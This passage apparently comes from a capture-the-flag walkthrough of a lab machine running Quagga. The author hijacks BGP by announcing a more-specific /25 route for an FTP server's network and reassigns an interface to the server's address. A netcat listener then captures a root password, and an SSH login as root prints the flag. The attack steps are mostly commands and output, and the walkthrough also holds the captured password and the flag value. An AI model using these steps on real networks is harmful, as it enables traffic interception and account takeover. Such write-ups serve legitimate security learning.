          TX packets:191 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:42612 (42.6 KB)  TX bytes:34096 (34.0 KB)

eth1      Link encap:Ethernet  HWaddr 00:16:3e:8a:f2:4f  
          inet addr:10.78.10.1  Bcast:10.78.10.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe8a:f24f/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7495 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7957 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:506169 (506.1 KB)  TX bytes:560602 (560.6 KB)

eth2      Link encap:Ethernet  HWaddr 00:16:3e:20:98:df  
          inet addr:10.78.11.1  Bcast:10.78.11.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe20:98df/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:8022 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7594 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:537793 (537.7 KB)  TX bytes:536761 (536.7 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:368 errors:0 dropped:0 overruns:0 frame:0
          TX packets:368 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:29952 (29.9 KB)  TX bytes:29952 (29.9 KB)

On the ticket page, we can find some info about this network. placeholder

We already know that Quagga is running on this server.
By enumeration, we can find additional servers which is realated to this server.
At the same time, we can assume this server is working on BGP and BGP hijacking is the possible solution.

root@r1:/etc/quagga# cat bgpd.conf
cat bgpd.conf
!
! Zebra configuration saved from vty
!   2018/07/02 02:14:27
!
route-map to-as200 permit 10
route-map to-as300 permit 10
!
router bgp 100
 bgp router-id 10.255.255.1
 network 10.101.8.0/21
 network 10.101.16.0/21
 redistribute connected
 neighbor 10.78.10.2 remote-as 200
 neighbor 10.78.11.2 remote-as 300
 neighbor 10.78.10.2 route-map to-as200 out
 neighbor 10.78.11.2 route-map to-as300 out
!
line vty

Showing BGP configuration:

r1# show ip bgp
show ip bgp
BGP table version is 0, local router ID is 10.255.255.1
Status codes: s suppressed, d damped, h history, * valid, > best, = multipath,
              i internal, r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

   Network          Next Hop            Metric LocPrf Weight Path
*> 10.78.10.0/24    0.0.0.0                  0         32768 ?
*> 10.78.11.0/24    0.0.0.0                  0         32768 ?
*> 10.99.64.0/24    0.0.0.0                  0         32768 ?
*  10.100.10.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.11.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.12.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.13.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.14.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.15.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.16.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.17.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.18.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.19.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*  10.100.20.0/24   10.78.11.2                             0 300 200 i
*>                  10.78.10.2               0             0 200 i
*> 10.101.8.0/21    0.0.0.0                  0         32768 i
*> 10.101.16.0/21   0.0.0.0                  0         32768 i
*> 10.120.10.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.11.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.12.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.13.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.14.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.15.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.16.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.17.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.18.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.19.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i
*> 10.120.20.0/24   10.78.11.2               0             0 300 i
*                   10.78.10.2                             0 200 300 i

Total number of prefixes 27

Connections to the ftp server “10.120.15.10” are transmitted with eth2(10.78.11.2)
Then, try to capture the ftp network traffic.
BGP configuration:

root@r1:~# vtysh
vtysh

Hello, this is Quagga (version 0.99.24.1).
Copyright 1996-2005 Kunihiro Ishiguro, et al.

r1# conf t
conf t
r1(config)# router gbp 100
router gbp 100
% Unknown command.
r1(config)# router bgp 100
router bgp 100
r1(config-router)# network 10.120.15.0/25
network 10.120.15.0/25
r1(config-router)# end
end
r1# exit

Then, configure eth2 as ftp server address.

root@r1:~# ifconfig eth2 10.120.15.10 netmask 255.255.255.0 up

Capture the traffic with netcat.
If we wait couple of minutes, there is a connection from remote host.
By sending a response message “331 Please specify the password.”, we can ahieve a password for user root.

root@r1:~# nc -nlvp 21
nc -nlvp 21
Listening on [0.0.0.0] (family 0, port 21)
Connection from [10.78.10.2] port 21 [tcp/*] accepted (family 2, sport 52504)

USER root
331 Please specify the password.
PASS BGPtelc0rout1ng

We can not use this password for ftp.
However. we can take advantage of this to login to “10.10.10.105” with ssh.

root@kali:~# ssh root@10.10.10.105
The authenticity of host '10.10.10.105 (10.10.10.105)' can't be established.
ECDSA key fingerprint is SHA256:ocbg7qpaEpjQc5WGCnavYd2bgyXg7S8if8UaXgT1ztE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.105' (ECDSA) to the list of known hosts.
root@10.10.10.105's password: 
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Mar 19 17:48:44 UTC 2019

  System load:  0.08               Users logged in:       0
  Usage of /:   40.8% of 19.56GB   IP address for ens33:  10.10.10.105
  Memory usage: 32%                IP address for lxdbr0: 10.99.64.1
  Swap usage:   0%                 IP address for lxdbr1: 10.120.15.10
  Processes:    211


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

4 packages can be updated.
0 updates are security updates.


Last login: Wed Sep  5 14:32:15 2018
root@carrier:~# ls
root.txt  secretdata.txt
root@carrier:~# cat root.txt 
2832e552061532250ac2a21478fd4866